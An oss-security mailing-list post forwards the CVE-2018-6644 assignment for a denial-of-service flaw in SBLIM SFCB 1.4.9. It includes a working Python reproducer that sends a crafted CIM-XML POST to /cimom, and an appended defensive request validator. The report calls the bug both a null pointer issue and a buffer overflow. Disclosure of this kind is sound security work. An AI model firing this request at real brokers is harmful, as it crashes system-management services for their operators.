Date: Wed, 7 Feb 2018 13:04:18 +0800 (CST)
From: XinleiHe  <hxl1999@...h.net>
To: oss-security@...ts.openwall.com
Subject: Fw:Re: [scr459004] sfcb - 1.4.9

-------- Forwarding messages --------
From: cve-request@...re.org
Date: 2018-02-06 04:11:55
To:  hxl1999@...h.net
Cc:  cve-request@...re.org
Subject: Re: [scr459004] sfcb - 1.4.9
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

The CVE ID is below. Please inform the software maintainer that the
CVE ID has been assigned.


> [Suggested description]
> SBLIM Small Footprint CIM Broker (SFCB) 1.4.9 has a
> null pointer (DoS) vulnerability via
> a crafted POST request to the /cimom URI.
> 
> ------------------------------------------
> 
> [Additional Information]
> You can use the following Python code to reproduce this vulnerability.
> 
> import httplib
> from xml.dom.minidom import Document
> class write_xml(Document):
>     def __init__(self):
> 
>         Document.__init__(self)
>  
>     def set_tag(self,tag):
>         self.tag = tag
>         self.cim = self.createElement(self.tag)
>         #self.setAttribute("encoding", "utf-8")
>         
>         self.cim.setAttribute("CIMVERSION", "2.0")
>         self.cim.setAttribute("DTDVERSION", "2.0")
>         self.appendChild(self.cim)
> 
>         self.msg = self.createElement("MESSAGE")
>         self.msg.setAttribute("ID", "4711")
>         self.msg.setAttribute("PROTOCOLVERSION","1.0")
>         self.cim.appendChild(self.msg)
> 
>         self.sim = self.createElement("SIMPLEREQ")
>         self.msg.appendChild(self.sim)
> 
>         self.ime = self.createElement("IMETHODCALL")
>         self.ime.setAttribute("NAME","EnumerateInstances")
>         self.sim.appendChild(self.ime)
> 
>         self.local = self.createElement("LOCALNAMESPACEPATH")
>         self.ime.appendChild(self.local)
>           
>         self.names1=self.createElement("NAMESPACE")
>         self.names1.setAttribute("NAME", "root")
>         self.local.appendChild(self.names1)
> 
>     def display(self):
>         print self.toprettyxml(indent="   ")
>     def retdata(self):
>         return self.toprettyxml(indent="   ")
> 
> def httpreq(data):
>  conn = httplib.HTTPConnection("127.0.0.1", 5988, False)
>  conn.request('POST', '/cimom',data)
>  res = conn.getresponse() 
> 
> def main(): 
>  wx = write_xml()
>  wx.set_tag('CIM')
>  print wx.retdata()
>  print httpreq(wx.retdata())
> 
> if __name__=='__main__':
>  main()
> 
> ------------------------------------------
> 
> [Vulnerability Type]
> Buffer Overflow
> 
> ------------------------------------------
> 
> [Vendor of Product]
> SBLIM project
> 
> ------------------------------------------
> 
> [Affected Product Code Base]
> sfcb - 1.4.9
> 
> ------------------------------------------
> 
> [Impact Denial of Service]
> true

Use CVE-2018-6644.


- -- 
CVE Assignment Team
M/S M300, 202 Burlington Road, Bedford, MA 01730 USA
[ A PGP key is available for encrypted communications at
  http://cve.mitre.org/cve/request_id.html ]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
-----END PGP SIGNATURE-----
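
Added example, not part of the original message or of SFCB: a check that a proxy or test harness could run on /cimom request bodies. It flags intrinsic method calls that lack the input parameters DSP0200 makes mandatory, as the request built by the reproducer does (it carries no IPARAMVALUE). The message does not say which omission triggers the crash, so treating the missing ClassName as relevant is an assumption, as are the function name, the parameter table and the sample bodies.

```python
import xml.etree.ElementTree as ET

# Assumption of this example: a subset of the mandatory inputs listed in DSP0200.
REQUIRED_PARAMS = {
    "GetClass": {"ClassName"},
    "EnumerateInstances": {"ClassName"},
    "EnumerateInstanceNames": {"ClassName"},
    "GetInstance": {"InstanceName"},
    "ExecQuery": {"QueryLanguage", "Query"},
}

def check_cim_request(body):
    """Return a list of findings for one CIM-XML request body (empty = ok)."""
    if b"<!DOCTYPE" in body or b"<!ENTITY" in body:
        return ["DTD/entity declaration present"]  # refuse before parsing
    try:
        root = ET.fromstring(body)
    except ET.ParseError as exc:
        return ["not well-formed XML: %s" % exc]
    if root.tag != "CIM":
        return ["root element is %r, expected CIM" % root.tag]
    findings = []
    calls = root.findall("./MESSAGE/SIMPLEREQ/IMETHODCALL")
    if not calls:
        findings.append("no IMETHODCALL under MESSAGE/SIMPLEREQ")
    for call in calls:
        name = call.get("NAME")
        namespaces = call.findall("./LOCALNAMESPACEPATH/NAMESPACE")
        if not namespaces or any(not ns.get("NAME") for ns in namespaces):
            findings.append("%s: missing or unnamed NAMESPACE" % name)
        present = {p.get("NAME") for p in call.findall("./IPARAMVALUE")}
        missing = REQUIRED_PARAMS.get(name, set()) - present
        if missing:
            findings.append("%s: missing %s" % (name, ", ".join(sorted(missing))))
    return findings

# Constructed samples: the first has the element layout the reproducer builds.
REPRODUCER_SHAPE = b"""<?xml version="1.0" ?>
<CIM CIMVERSION="2.0" DTDVERSION="2.0"><MESSAGE ID="4711" PROTOCOLVERSION="1.0">
<SIMPLEREQ><IMETHODCALL NAME="EnumerateInstances"><LOCALNAMESPACEPATH>
<NAMESPACE NAME="root"/></LOCALNAMESPACEPATH></IMETHODCALL></SIMPLEREQ>
</MESSAGE></CIM>"""
WELL_FORMED = REPRODUCER_SHAPE.replace(b"</LOCALNAMESPACEPATH>",
    b'</LOCALNAMESPACEPATH><IPARAMVALUE NAME="ClassName">'
    b'<CLASSNAME NAME="CIM_ComputerSystem"/></IPARAMVALUE>')

if __name__ == "__main__":
    for label, body in (("reproducer shape", REPRODUCER_SHAPE), ("complete", WELL_FORMED)):
        print(label, "->", check_cim_request(body) or "ok")
```
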
